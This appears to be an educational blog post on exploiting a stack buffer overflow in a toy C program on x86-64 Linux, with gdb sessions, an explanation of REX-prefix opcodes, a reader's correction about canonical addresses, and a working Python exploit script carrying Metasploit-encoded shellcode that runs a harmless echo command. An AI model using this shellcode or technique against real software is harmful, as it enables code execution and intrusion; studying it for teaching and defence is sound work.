… or what a cool name for such a small thing
tl;dr
I thought that since every single CPU being sold in the last few years is 64 bits, it’s time to start getting familiar with it. Being on the offensive side of the fence I would like to check out how the change to 64 bits affects binary exploitation as we know it.
Disclaimer
This is by no means a complete discussion, just the result of a couple of days trying to satisfy my curiosity on the internets. It’s assumed you are familiar with basic x86 assembler and more or less with binary exploitation.
Intro
In order to start from scratch I'll check the differences between x86 and x86-64 (relevant to this topic) and compare how a simple vulnerable program written in C translates to both instruction sets. There will be some "minor" differences which affect the way we have to approach the problem. I'll mention these along the way, in order of appearance.
Vanilla stack based buffer overflow
*yawn*
Well, I know this is boring but you have to start from the beginning, don’t you think? :)
Let’s review really fast what happens during a regular stack based buffer overflow, shall we?
Below is a typical buffer overflow example. We call a function with a fixed-size buffer allocated on the stack; strcpy writes beyond the buffer's boundaries and overwrites other control data stored on the stack, among them the saved EIP value (the return address). When the function returns, this value is loaded into the EIP register and determines the address of the next instruction the CPU executes.
root@yomama[~/code]
[15:03]:cat b0f.c
#include <string.h>
void
boom(char *str)
{
char buffer[128];
strcpy(buffer, str); // The horror…
}
int
main(int argc, char *argv[])
{
boom(argv[1]);
return 0;
}
Just to make the discussion more straightforward I’m going to compile without stack protection, DEP, ASLR this time.
“Small moves Ellie, small moves” (10 geek points if you recognize the movie reference without googling :))
root@yomama[~/code][15:02]:gcc -o b0f-32 -O2 -fno-stack-protector -D_FORTIFY_SOURCE=0 b0f.c
root@yomama[~/code][15:02]:file b0f-32
b0f-32: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), for GNU/Linux 2.6.15, dynamically linked (uses shared libs), not stripped
So we are set. Let’s run the program inside a debugger.
root@yomama[~/code]
[15:05]:gdb -q ./b0f-32
(no debugging symbols found)
(gdb) set disassembly-flavor intel
(gdb) disassemble main
Dump of assembler code for function main:
0x080483e1 : lea ecx,[esp+0x4]
0x080483e5 : and esp,0xfffffff0
0x080483e8 : push DWORD PTR [ecx-0x4]
0x080483eb : push ebp
0x080483ec : mov ebp,esp
0x080483ee : push ecx
0x080483ef : sub esp,0x4
0x080483f2 : mov eax,DWORD PTR [ecx+0x4]
0x080483f5 : add eax,0x4
0x080483f8 : mov eax,DWORD PTR [eax]
0x080483fa : mov DWORD PTR [esp],eax
0x080483fd : call 0x80483c4
0x08048402 : mov eax,0x0
0x08048407 : add esp,0x4
0x0804840a : pop ecx
0x0804840b : pop ebp
0x0804840c : lea esp,[ecx-0x4]
0x0804840f : ret
End of assembler dump.
(gdb) disassemble boom
Dump of assembler code for function boom:
0x080483c4 : push ebp
0x080483c5 : mov ebp,esp
0x080483c7 : sub esp,0x88
0x080483cd : mov eax,DWORD PTR [ebp+0x8]
0x080483d0 : mov DWORD PTR [esp+0x4],eax
0x080483d4 : lea eax,[ebp-0x80]
0x080483d7 : mov DWORD PTR [esp],eax
0x080483da : call 0x80482f8
0x080483df : leave
0x080483e0 : ret
End of assembler dump.
(gdb) b *0x080483fd
Breakpoint 1 at 0x80483fd // breakpoint at CALL boom
(gdb) b *0x080483df
Breakpoint 2 at 0x80483df // breakpoint after the infamous strcpy call
I’ll run it with a small argument first, that is, no buffer overflow will happen.
(gdb) r AAAAAA
Starting program: /root/code/b0f-32 AAAAAA
Breakpoint 1, 0x080483fd in main ()
(gdb) x/8x $esp
0xbf9d86e0: 0xbf9d8e26 0xbf9d8700 0xbf9d8778 0xb773abd6
0xbf9d86f0: 0x08048420 0x00000000 0xbf9d8778 0xb773abd6
This is the breakpoint just before the CALL boom() instruction is executed. The top of the stack looks like above.
We continue the execution and hit the breakpoint right after the strcpy call.
Breakpoint 2, 0x080483df in boom ()
(gdb) x/8x $esp
0xbf9d8650: 0xbf9d8658 0xbf9d8e26 0x41414141 0x00004141
0xbf9d8660: 0xb78b3ff4 0xbf9d8750 0xb78b4ab0 0xbf9d8724
Look at the top of the stack now (remember we are inside boom(), so this is actually another stack frame, distinct from main's).
You can identify the beginning of our buffer, filled with the 6 A's from the argument.
Note: the first two dwords you see in front of it are the arguments for strcpy itself; remember the breakpoint is at the leave instruction and they haven't been cleaned up yet.
Now what about the bottom of the stack?
You can recognize our previous “top of the stack” and the two new values:
0x08048402: pushed by the CALL instruction itself, the saved EIP value
0xbf9d86e8: pushed by boom() prologue, the saved value of EBP in order to reconstruct the old stack frame after it returns.
(gdb) x/8x $ebp
0xbf9d86d8: 0xbf9d86e8 0x08048402 0xbf9d8e26 0xbf9d8700
0xbf9d86e8: 0xbf9d8778 0xb773abd6 0x08048420 0x00000000
The important point here is that crucial values that determine execution flow are on the stack and susceptible to be changed by an attacker.
It’s a design flaw: user data and important system state information coexist on the same memory space.
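To make the layout concrete, here is a minimal Python sketch of the 32-bit frame of boom(). The only inputs are the lea eax,[ebp-0x80] instruction from the disassembly and the usual push ebp / CALL behaviour; the function and constant names are made up for illustration.

```python
# Offsets read from the 32-bit disassembly of boom():
#   lea eax,[ebp-0x80]  -> the buffer starts 0x80 bytes below EBP
BUFFER_OFFSET_FROM_EBP = 0x80  # bytes from buffer start up to the saved EBP
SAVED_EBP_SIZE = 4             # pushed by "push ebp" in the prologue


def bytes_to_reach_saved_eip():
    """Bytes that fit in front of the saved EIP (buffer area + saved EBP)."""
    return BUFFER_OFFSET_FROM_EBP + SAVED_EBP_SIZE


def clobbered(n_bytes):
    """Which saved values does an n_bytes-long argument touch?

    strcpy also writes the terminating NUL, so n_bytes + 1 bytes land
    on the stack.
    """
    written = n_bytes + 1
    return {
        "saved_ebp": written > BUFFER_OFFSET_FROM_EBP,
        "saved_eip": written > bytes_to_reach_saved_eip(),
    }


print(bytes_to_reach_saved_eip())
print(clobbered(6))
print(clobbered(200))
```

With the 6-byte argument nothing important is touched; with 200 bytes both the saved EBP and the saved EIP are overwritten.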
If I copy too much data beyond my buffer I mangle those values…
(gdb) r $(python -c 'print "A" * 200') // copy 200 A's
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /root/code/b0f-32 $(python -c 'print "A" * 200')
The top of the stack before EIP is pushed.
Breakpoint 1, 0x080483fd in main ()
(gdb) x/8x $esp
0xbfcc39c0: 0xbfcc3d64 0xbfcc39e0 0xbfcc3a58 0xb7751bd6
0xbfcc39d0: 0x08048420 0x00000000 0xbfcc3a58 0xb7751bd6
After the strcpy function wrote all those A’s
(gdb) c
Continuing.
Breakpoint 2, 0x080483df in boom ()
(gdb) x/8x $esp
0xbfcc3930: 0xbfcc3938 0xbfcc3d64 0x41414141 0x41414141
0xbfcc3940: 0x41414141 0x41414141 0x41414141 0x41414141
(gdb) x/8x $ebp
0xbfcc39b8: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfcc39c8: 0x41414141 0x41414141 0x41414141 0x41414141
The saved EIP value (the second dword shown at $ebp, at address 0xbfcc39bc) is now overwritten with 0x41414141. When the CPU loads this into EIP and tries to resume execution…
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) info r
eax 0xbfcc3938 -1077135048
ecx 0x0 0
edx 0xc9 201
ebx 0xb7890ff4 -1215754252
esp 0xbfcc39c0 0xbfcc39c0
ebp 0x41414141 0x41414141
esi 0x0 0
edi 0x0 0
eip 0x41414141 0x41414141
eflags 0x10246 [ PF ZF IF RF ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
Boom. Now the idea is “I can write bytes (opcodes) into memory. I can control flow execution. I can tell the processor to go and execute my opcodes”. Great.
Wake up. Now comes the 64 bit stuff.
All this is very nice but you have seen it a million times, haven’t you?
Let’s compile the same code on a 64 bit machine.
carlos@zarafa:~/c0de$ file b0f
b0f: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, not stripped
Let’s check out the assembly GCC generated from that code.
carlos@zarafa:~/c0de$ gdb -q ./b0f
(gdb) set disassembly-flavor intel
(gdb) disassemble main
Dump of assembler code for function main:
0x0000000000400570 <+0>: sub rsp,0x8
0x0000000000400574 <+4>: mov rdi,QWORD PTR [rsi+0x8]
0x0000000000400578 <+8>: call 0x400550
0x000000000040057d <+13>: xor eax,eax
0x000000000040057f <+15>: add rsp,0x8
0x0000000000400583 <+19>: ret
End of assembler dump.
(gdb) disassemble boom
Dump of assembler code for function boom:
0x0000000000400550 <+0>: sub rsp,0x88
0x0000000000400557 <+7>: mov rsi,rdi
0x000000000040055a <+10>: mov edx,0x80
0x000000000040055f <+15>: mov rdi,rsp
0x0000000000400562 <+18>: call 0x400450 <__strcpy_chk@plt>
0x0000000000400567 <+23>: add rsp,0x88
0x000000000040056e <+30>: ret
End of assembler dump.
There are some obvious differences:
- Generated code is smaller
- Look at the size of those addresses!
- Registers’ names look funny
- The QWORD reserved word
and some other not so obvious differences:
- Wait. Where are the function arguments being pushed?
- Where is the stack frame generation?
The well-known E* registers (EAX, EBX, etc.) have been extended to 64 bits and are now named R* (RAX, RBX, etc.). As with the transition from 16 to 32 bits, the lower bits can be accessed through the old names; that is, EAX is the lower 32 bits of RAX, and so on.
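The aliasing can be modelled with plain integer masks. The sketch below is only an illustration (the helper names are invented); it also shows one detail worth knowing: a write to a 32-bit register such as EAX zeroes the upper half of RAX, while a 16-bit write to AX leaves the upper bits alone.

```python
MASK64 = 0xFFFFFFFFFFFFFFFF
MASK32 = 0xFFFFFFFF
MASK16 = 0xFFFF


def read_eax(rax):
    """EAX is simply the low 32 bits of RAX."""
    return rax & MASK32


def write_eax(rax, value):
    """A 32-bit write zero-extends: the upper 32 bits of RAX become 0."""
    return value & MASK32


def write_ax(rax, value):
    """A 16-bit write only replaces the low 16 bits of RAX."""
    return (rax & (MASK64 ^ MASK16)) | (value & MASK16)


rax = 0x1122334455667788
print(hex(read_eax(rax)))
print(hex(write_eax(rax, 0)))       # what "xor eax,eax" leaves in RAX
print(hex(write_ax(rax, 0xBEEF)))
```

That zero-extension is why the 64-bit main() above can get away with xor eax,eax to return 0.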
But more relevant for exploit development is the fact that in such a huge address range the code will be located at addresses of the form 0x00000000xxxxxxxx. This is going to be a problem, for example, in string-based overflows. Null bytes always ruin the party, but as we know there are workarounds for this annoyance.
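A quick way to see the null-byte problem is to pack a couple of the addresses from this post as little-endian 64-bit values and check how much of each a strcpy would actually copy. This is a small sketch; pack_addr64 and strcpy_visible are illustrative helpers, not part of any tool.

```python
import struct


def pack_addr64(addr):
    """Little-endian 8-byte representation of a 64-bit address."""
    return struct.pack("<Q", addr)


def strcpy_visible(data):
    """Bytes strcpy would copy: everything before the first NUL."""
    return data.split(b"\x00", 1)[0]


code_addr = pack_addr64(0x0000000000400550)   # boom() in the 64-bit binary
stack_addr = pack_addr64(0x00007fffffffe570)  # a stack address from the gdb session

print(code_addr, len(strcpy_visible(code_addr)))
print(stack_addr, len(strcpy_visible(stack_addr)))
```

Only 3 bytes of the code address and 6 bytes of the stack address survive; anything placed after the address in the same string is never copied.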
However real changes on the architecture will probably have a higher impact on the way we write exploits.
For example, two related changes:
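Did you notice the missing function prologue? Since the function uses the stack to store local variables it moves RSP to allocate some space, but the frame pointer (here it would be RBP) hasn't been pushed onto the stack.
It turns out that on x86-64 the frame pointer is optional. RBP still exists, but the System V AMD64 ABI does not require it to hold a frame base, so an optimizing compiler is free to skip the push rbp / mov rbp,rsp prologue and address locals relative to RSP.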
And what about pushing the arguments onto the stack before a CALL?
In x86-64 (System V ABI, as used on Linux) the first six integer or pointer arguments are passed in registers (RDI, RSI, RDX, RCX, R8 and R9, in that order), which reduces the number of memory accesses and results in more efficient code. That is why main() loads argv[1] into RDI right before the call.
I don't like that either, because the less important metadata there is on the stack, the less chance I have to use a bug to overwrite something potentially important. meh…
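As a rough illustration of that convention, the following sketch assigns integer or pointer arguments to registers in System V order and spills the rest to the stack. It deliberately ignores floating-point and struct arguments, and the function name is made up.

```python
# Integer/pointer argument registers in the System V AMD64 calling convention.
SYSV_INT_ARG_REGS = ("rdi", "rsi", "rdx", "rcx", "r8", "r9")


def assign_int_args(args):
    """Map integer/pointer arguments to registers; extras go on the stack."""
    regs = dict(zip(SYSV_INT_ARG_REGS, args))
    stack = list(args[len(SYSV_INT_ARG_REGS):])
    return regs, stack


# strcpy(buffer, str) as called from boom()
print(assign_int_args(["buffer", "str"]))

# A hypothetical call with eight arguments: two of them spill to the stack.
print(assign_int_args(list(range(1, 9))))
```

This matches the disassembly of boom(): the incoming str pointer is moved from RDI to RSI (second argument) and the buffer address, RSP, goes into RDI (first argument).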
Anyway, the return address (the saved RIP, the 64-bit counterpart of EIP) is still stored on the stack as usual, so let's try to exploit this toy model.
First let's check the offset I need in order to overwrite the saved EIP value precisely.
Since the function decrements RSP by 0x88 and there's no saved RBP, it looks like 136 bytes will do the trick.
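The arithmetic is trivial, but spelling it out makes the assumptions visible: the buffer starts exactly at RSP (mov rdi,rsp) and nothing else sits between the locals and the return address. The helper below is a hypothetical sketch of that calculation.

```python
FRAME_SIZE = 0x88  # from "sub rsp,0x88" in boom()


def offset_to_return_address(frame_size, buffer_offset_from_rsp=0, saved_rbp=False):
    """Bytes between the start of the buffer and the saved return address."""
    offset = frame_size - buffer_offset_from_rsp
    if saved_rbp:
        offset += 8  # a pushed RBP would sit right below the return address
    return offset


print(offset_to_return_address(FRAME_SIZE))

# Cross-check against the addresses gdb reports in the session that follows:
# return address slot at 0x7fffffffe5f8, buffer at 0x7fffffffe570.
print(0x7fffffffe5f8 - 0x7fffffffe570)
```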
carlos@zarafa:~/c0de$ gdb -q ./b0f
(gdb) set disassembly-flavor intel
(gdb) disassemble boom
Dump of assembler code for function boom:
0x0000000000400530 <+0>: sub rsp,0x88
0x0000000000400537 <+7>: mov rsi,rdi
0x000000000040053a <+10>: mov rdi,rsp
0x000000000040053d <+13>: call 0x400428
0x0000000000400542 <+18>: add rsp,0x88
0x0000000000400549 <+25>: ret
End of assembler dump.
(gdb) b *0x0000000000400530 // at the beginning of boom()
Breakpoint 1 at 0x400530
(gdb) b *0x0000000000400542 // right after strcpy
Breakpoint 2 at 0x400542
(gdb) r $(python -c 'print "A" * 136 + "BCD"')
Starting program: /home/carlos/c0de/b0f $(python -c 'print "A" * 136 + "BCD"')
Breakpoint 1, 0x0000000000400530 in boom ()
(gdb) p $rsp
$1 = (void *) 0x7fffffffe5f8 // The saved EIP value is stored here
(gdb) x/8x $rsp
0x7fffffffe5f8: 0x0040055d 0x00000000 0x00000000 0x00000000
0x7fffffffe608: 0xf7a78c4d 0x00007fff 0x00000000 0x00000000
(gdb) c
Continuing.
Breakpoint 2, 0x0000000000400542 in boom ()
(gdb) p $rsp
$2 = (void *) 0x7fffffffe570 // The beginning of our payload
(gdb) x/8x $rsp
0x7fffffffe570: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe580: 0x41414141 0x41414141 0x41414141 0x41414141
(gdb) x/8x 0x7fffffffe5f8 // overwritten!
0x7fffffffe5f8: 0x00444342 0x00000000 0x00000000 0x00000000
0x7fffffffe608: 0xf7a78c4d 0x00007fff 0x00000000 0x00000000
So we overwrote the EIP value. Neat.
Now in x86, with an easy example like this (no stack cookies, no DEP/ASLR), we would look for an address containing something like jmp esp, jump to it and land in our shellcode. However, in a program this short it's unlikely that I'll find the required instruction.
So for this toy model I’m going to just hardcode the address of the top of the stack.
Flamewars ahead, I know :)
(gdb) r $(python -c 'print "A" * 136 + "\x70\xe5\xff\xff\xff\x7f"')
Breakpoint 1, 0x0000000000400530 in boom () // at the very beginning of boom()
(gdb) x/8x $rsp // saved EIP value
0x7fffffffe5f8: 0x0040055d 0x00000000 0x00000000 0x00000000
0x7fffffffe608: 0xf7a78c4d 0x00007fff 0x00000000 0x00000000
(gdb) b *0x0000000000400542
Breakpoint 2 at 0x400542
(gdb) c
Continuing.
Breakpoint 2, 0x0000000000400542 in boom ()
(gdb) x/8x 0x7fffffffe5f8 // overwritten!
0x7fffffffe5f8: 0xffffe570 0x00007fff 0x00000000 0x00000000
0x7fffffffe608: 0xf7a78c4d 0x00007fff 0x00000000 0x00000000
(gdb) x/8x 0x7fffffffe570 // showing my s
0x7fffffffe570: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe5c8: 0x41414141 0x41414141 0x41414141 0x41414141
(gdb) si // single step
0x0000000000400549 in boom () // This is the RET instruction at the end of boom()
(gdb) si // single step
0x00007fffffffe570 in ?? () // hmmmm…
(gdb) info reg
rax 0x7fffffffe570 140737488348528
rbx 0x0 0
rcx 0x0 0
rdx 0x7fffffffe5fe 140737488348670
rsi 0x7fffffffe9a0 140737488349600
rdi 0x7fffffffe570 140737488348528
rbp 0x0 0x0
rsp 0x7fffffffe600 0x7fffffffe600
r8 0xfefefefefefefeff -72340172838076673
r9 0xffffffffffffff00 -256
r10 0x7fffffffe310 140737488347920
r11 0x7ffff7adcce0 140737348750560
r12 0x400440 4195392
r13 0x7fffffffe6e0 140737488348896
r14 0x0 0
r15 0x0 0
rip 0x7fffffffe570 0x7fffffffe570 // execution is here
eflags 0x202 [ IF ]
cs 0x33 51
ss 0x2b 43
ds 0x0 0
es 0x0 0
fs 0x0 0
gs 0x0 0
(gdb) si
Program received signal SIGSEGV, Segmentation fault.
0x00007fffffffe570 in ?? ()
(gdb) x/8x $rip
0x7fffffffe570: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe5c8: 0x41414141 0x41414141 0x41414141 0x41414141
Hey, what’s with the weird crash?
Hmmm… What has just happened? Everything looked fine, I was able to overwrite the saved EIP value and redirect execution to my buffer. But it crashes when trying to execute the first instruction…
Damn, is there any kind of NX mechanism in place, marking the stack as non-executable?
After inspecting my system, the NX bit isn’t activated and the binary hasn’t been compiled with any other kind of stack execution prevention.
What about the instructions I’m trying to execute?
What does the opcode 0x41 (or 0x4141) mean in x86-64?
It turns out that while in x86 the opcode 0x41 corresponds to INC ECX and is therefore harmless enough to act as a kind of NOP, suitable for a PoC or a first sketch of your exploit… in x86-64 it is something completely different :)
In 64-bit mode the bytes 0x40 to 0x4F don't mean anything by themselves; they are REX prefixes, needed to select 64-bit operand size and to address the 16 registers (they weren't necessary in x86, with only 8 GPRs).
NOTE: This difference in opcode decoding is leveraged in a very neat trick to make your shellcode architecture independent. Read more here.
Long story short, don't use "A"s as junk when developing your exploit or all those crashes will get somewhat confusing :)
Instead you can use good old 0x90 NOPs or something less obvious, for example the byte pair 0x24 0xFF, which decodes to AND AL, 0xFF.
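For the curious, the REX prefix has the bit layout 0100WRXB, so decoding it takes a few lines. The sketch below (decode_rex is an illustrative name) shows what 0x41 looks like through 64-bit eyes, and why the 0x48 bytes all over the shellcode further down are nothing unusual.

```python
def decode_rex(byte):
    """Decode a REX prefix (0x40-0x4F in 64-bit mode), or return None.

    Layout: 0100 W R X B
      W: 64-bit operand size
      R: extends the ModRM reg field
      X: extends the SIB index field
      B: extends the ModRM rm / SIB base / opcode reg field
    """
    if byte & 0xF0 != 0x40:
        return None
    return {
        "W": bool(byte & 0x08),
        "R": bool(byte & 0x04),
        "X": bool(byte & 0x02),
        "B": bool(byte & 0x01),
    }


print(decode_rex(0x41))  # "A": a REX prefix with only B set
print(decode_rex(0x48))  # REX.W, e.g. 48 31 c9 = xor rcx,rcx
print(decode_rex(0x90))  # NOP is not a REX prefix
```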
Finish him!
OK, back to the exploit. Now that I know that I can jump to my payload and it will be executed let’s put some simple metasploit magic there.
root@yomama[~]
[20:47]:msfpayload linux/x64/exec CMD="echo PWND" R | msfencode -b '\x00' -e x64/xor -t c
[*] x64/xor succeeded with size 95 (iteration=1)
unsigned char buf[] =
"\x48\x31\xc9\x48\x81\xe9\xf9\xff\xff\xff\x48\x8d\x05\xef\xff"
"\xff\xff\x48\xbb\xc5\xb6\x57\xcc\xbf\x7a\x60\xc7\x48\x31\x58"
"\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\xaf\x8d\x0f\x55\xf7\xc1"
"\x4f\xa5\xac\xd8\x78\xbf\xd7\x7a\x33\x8f\x4c\x51\x3f\xe1\xdc"
"\x7a\x60\x8f\x4c\x50\x05\x24\xb5\x7a\x60\xc7\xa0\xd5\x3f\xa3"
"\x9f\x2a\x37\x89\x81\xb6\x01\x9b\xf7\xf3\x86\xc8\xc0\xb6\x57"
"\xcc\xbf\x7a\x60\xc7";
Nothing fancy.
So putting all together, the exploit will look like this:
carlos@zarafa:~/c0de$ cat pwn64.py
#
# Simple 64 bits b0f example
# Little and cute.
# (Python 2: str is a byte string and print is a statement)
#
offset_to_eip = 136
# msfpayload linux/x64/exec CMD="echo PWND" R | msfencode -b '\x00' -e x64/xor -t c
# [*] x64/xor succeeded with size 95 (iteration=1)
hellcode = (
"\x48\x31\xc9\x48\x81\xe9\xf9\xff\xff\xff\x48\x8d\x05\xef\xff"
"\xff\xff\x48\xbb\xc5\xb6\x57\xcc\xbf\x7a\x60\xc7\x48\x31\x58"
"\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\xaf\x8d\x0f\x55\xf7\xc1"
"\x4f\xa5\xac\xd8\x78\xbf\xd7\x7a\x33\x8f\x4c\x51\x3f\xe1\xdc"
"\x7a\x60\x8f\x4c\x50\x05\x24\xb5\x7a\x60\xc7\xa0\xd5\x3f\xa3"
"\x9f\x2a\x37\x89\x81\xb6\x01\x9b\xf7\xf3\x86\xc8\xc0\xb6\x57"
"\xcc\xbf\x7a\x60\xc7")
# jmp to shellcode at 0x7fffffffe570
# Note I only write six bytes. The two leading 0x00 bytes
# (64 bit address) are already on the stack.
eip = "\x70\xe5\xff\xff\xff\x7f"
# 95 bytes of shellcode + 40 bytes of AND AL,0xFF filler + 1 NOP = 136 = offset_to_eip
string = hellcode + ("\x24\xFF" * 20) + "\x90" + eip # hardcoded, nasty
print string
This python script will generate the string used as argument. Let’s follow the execution inside the debugger…
carlos@zarafa:~/c0de$ gdb -q ./b0f
(gdb) set disassembly-flavor intel
(gdb) disassemble boom
Dump of assembler code for function boom:
0x0000000000400530 <+0>: sub rsp,0x88
0x0000000000400537 <+7>: mov rsi,rdi
0x000000000040053a <+10>: mov rdi,rsp
0x000000000040053d <+13>: call 0x400428
0x0000000000400542 <+18>: add rsp,0x88
0x0000000000400549 <+25>: ret
End of assembler dump.
(gdb) b* boom // breakpoint at the beginning
Breakpoint 1 at 0x400530
(gdb) b* 0x0000000000400549 // breakpoint at the RET instruction
Breakpoint 2 at 0x400549
(gdb) r $(python pwn64.py)
Starting program: /home/carlos/c0de/b0f $(python pwn64.py)
Breakpoint 1, 0x0000000000400530 in boom ()
(gdb) x/8x $rsp // The saved EIP value
0x7fffffffe5f8: 0x0040055d 0x00000000 0x00000000 0x00000000
0x7fffffffe608: 0xf7a78c4d 0x00007fff 0x00000000 0x00000000
(gdb) c
Continuing.
Breakpoint 2, 0x0000000000400549 in boom ()
(gdb) x/8x $rsp // overwritten!
0x7fffffffe5f8: 0xffffe570 0x00007fff 0x00000000 0x00000000
0x7fffffffe608: 0xf7a78c4d 0x00007fff 0x00000000 0x00000000
(gdb) x/32x 0x7fffffffe570 // Our payload is on the stack
0x7fffffffe570: 0x48c93148 0xfff9e981 0x8d48ffff 0xffffef05
0x7fffffffe580: 0xc5bb48ff 0xbfcc57b6 0x48c7607a 0x48275831
0x7fffffffe590: 0xfffff82d 0xaff4e2ff 0xf7550f8d 0xaca54fc1
0x7fffffffe5a0: 0xd7bf78d8 0x4c8f337a 0xdce13f51 0x4c8f607a
0x7fffffffe5b0: 0xb5240550 0xa0c7607a 0x9fa33fd5 0x8189372a
0x7fffffffe5c0: 0xf79b01b6 0xc0c886f3 0xbfcc57b6 0x24c7607a
0x7fffffffe5d0: 0x24ff24ff 0x24ff24ff 0x24ff24ff 0x24ff24ff
0x7fffffffe5e0: 0x24ff24ff 0x24ff24ff 0x24ff24ff 0x24ff24ff
(gdb) si
0x00007fffffffe570 in ?? () // single stepping takes me to it
(gdb) p $rip
$1 = (void (*)()) 0x7fffffffe570
(gdb) c
Continuing.
process 11209 is executing new program: /bin/dash
PWND
Program exited normally.
(gdb)
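For reference, the layout produced by pwn64.py (code, then filler up to the offset, then the truncated return address) can be sketched in Python 3, where byte strings have to be handled explicitly. This is not the script used above: build_payload is a made-up helper, and the 95 NOP bytes are just a placeholder with the same length as the encoded payload.

```python
import struct

OFFSET_TO_RETURN_ADDRESS = 136  # 0x88 bytes of frame, no saved RBP
FILLER = b"\x24\xff"            # AND AL,0xFF, the two-byte "NOP" from the post


def build_payload(code, return_address, offset=OFFSET_TO_RETURN_ADDRESS):
    """code + filler up to `offset` + return address without its zero bytes."""
    pad_len = offset - len(code)
    if pad_len < 0:
        raise ValueError("code does not fit in front of the return address")
    # Two-byte filler, plus a single 0x90 if an odd byte is left over.
    filler = FILLER * (pad_len // 2) + b"\x90" * (pad_len % 2)
    # strcpy stops at NUL, so drop the high zero bytes of the address;
    # they are expected to be on the stack already.
    addr = struct.pack("<Q", return_address).rstrip(b"\x00")
    payload = code + filler + addr
    if b"\x00" in payload:
        raise ValueError("payload contains a NUL byte and would be truncated")
    return payload


placeholder = b"\x90" * 95  # stand-in with the size of the encoded payload
payload = build_payload(placeholder, 0x7fffffffe570)
print(len(payload), payload[-6:].hex())
```

To feed such a payload to the program from Python 3 you would write it with sys.stdout.buffer.write rather than print, so that the bytes are not re-encoded.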
Note again the issue with the huge addresses. I didn't have to write the two leading zero bytes of the address I used to overwrite the saved EIP. The zeros were already there (well, technically I wrote one of them with the string terminator).
This will always be the case here, since what sits at this position is the saved return address, which points into the .text section and is therefore of the form 0x00000000XXXXXXXX.
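The effect is easy to simulate: take the 8 bytes originally stored in the return address slot, let a strcpy-like write deposit the tail of the string plus its terminating NUL, and see what 64-bit value comes out. The helper name is invented; the values are the ones from the gdb sessions above.

```python
import struct


def strcpy_over_slot(slot, tail):
    """Overwrite the start of an 8-byte slot with `tail` plus a NUL terminator."""
    written = tail + b"\x00"
    if len(written) > len(slot):
        raise ValueError("tail is longer than the slot")
    return written + slot[len(written):]


original = struct.pack("<Q", 0x000000000040055d)  # saved return address into main()

# The six address bytes from the exploit: the NUL supplies byte 7,
# byte 8 was already zero.
after = strcpy_over_slot(original, b"\x70\xe5\xff\xff\xff\x7f")
print(hex(struct.unpack("<Q", after)[0]))

# The earlier "BCD" test run, for comparison.
after_bcd = strcpy_over_slot(original, b"BCD")
print(hex(struct.unpack("<Q", after_bcd)[0]))
```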
That was long…
As you can see, exploitation of string-based buffer overflows on x86-64 is similar to its x86 counterpart, at least at this baby level.
Presumably, as we add more complexity to the arena (Unicode, DEP, ASLR, etc.), nuances like the different opcode decoding, null bytes in every address, the frequently missing saved frame pointer and so on will have a bigger effect on the way we solve the problem.
But let's not forget that x86-64 also changes the instruction set itself: eight additional general-purpose registers (R8 to R15), RIP-relative addressing, and a guaranteed baseline that includes conditional moves (CMOV itself predates x86-64, but here you can always count on it). It would be nice to find ways to leverage this in order to create new exploitation methods unique to this platform.
The future looks exciting :)
References:
“Corelan Exploit Writing Tutorials” (focus on x86)
The “weird crash” is not caused by the meaning of the op-code.
The reason you get a crash with EIP 0x41414141 on 32-bit x86 is that when the program pops the previously saved EIP value off the stack and back into EIP, the CPU then tries to execute the instruction at memory address 0x41414141, which causes a segfault (it must fetch the page prior to execution, of course).
Now, during x64 execution, when the program pops the previously saved RIP value back into the RIP register, the CPU tries to execute the instructions at memory address 0x4141414141414141. Firstly, due to canonical form addressing, bits 48 through 63 of any virtual address must be copies of bit 47 (in a manner akin to sign extension), or the processor will raise an exception. Even if that were not an issue, the kernel does additional checks before invoking the page fault handler, since the maximum user space address is 0x00007FFFFFFFFFFF.
To recap, on 32-bit x86 the address is passed without any "validation" to the page fault handler, which attempts to load the page and triggers the kernel to send the program a segfault, but x64 does not get this far.
Test it: overwrite RIP with 0x0000414141414141 and you will see the expected value placed in RIP, since the prechecks pass, and then the page fault handler is invoked like in the 32-bit case (which, of course, then causes the program to crash).
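The canonical-form rule described in this comment can be checked with a few lines of Python. The sketch assumes 48-bit virtual addresses (the common 4-level paging setup); is_canonical and USER_MAX are illustrative names.

```python
USER_MAX = 0x00007FFFFFFFFFFF  # highest user space address with 48-bit VAs


def is_canonical(addr, va_bits=48):
    """True if bits (va_bits-1)..63 of addr are all 0 or all 1."""
    top = addr >> (va_bits - 1)                # bit 47 and everything above it
    all_ones = (1 << (64 - va_bits + 1)) - 1   # 17 set bits for va_bits=48
    return top == 0 or top == all_ones


for addr in (0x4141414141414141, 0x0000414141414141, 0x00007fffffffe570):
    print(hex(addr), is_canonical(addr), addr <= USER_MAX)
```

Eight A's produce a non-canonical address, while six A's (with the two zero bytes already on the stack) give a canonical user space address.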
Hi Andy,
thanks for this precise and extensive technical explanation! :)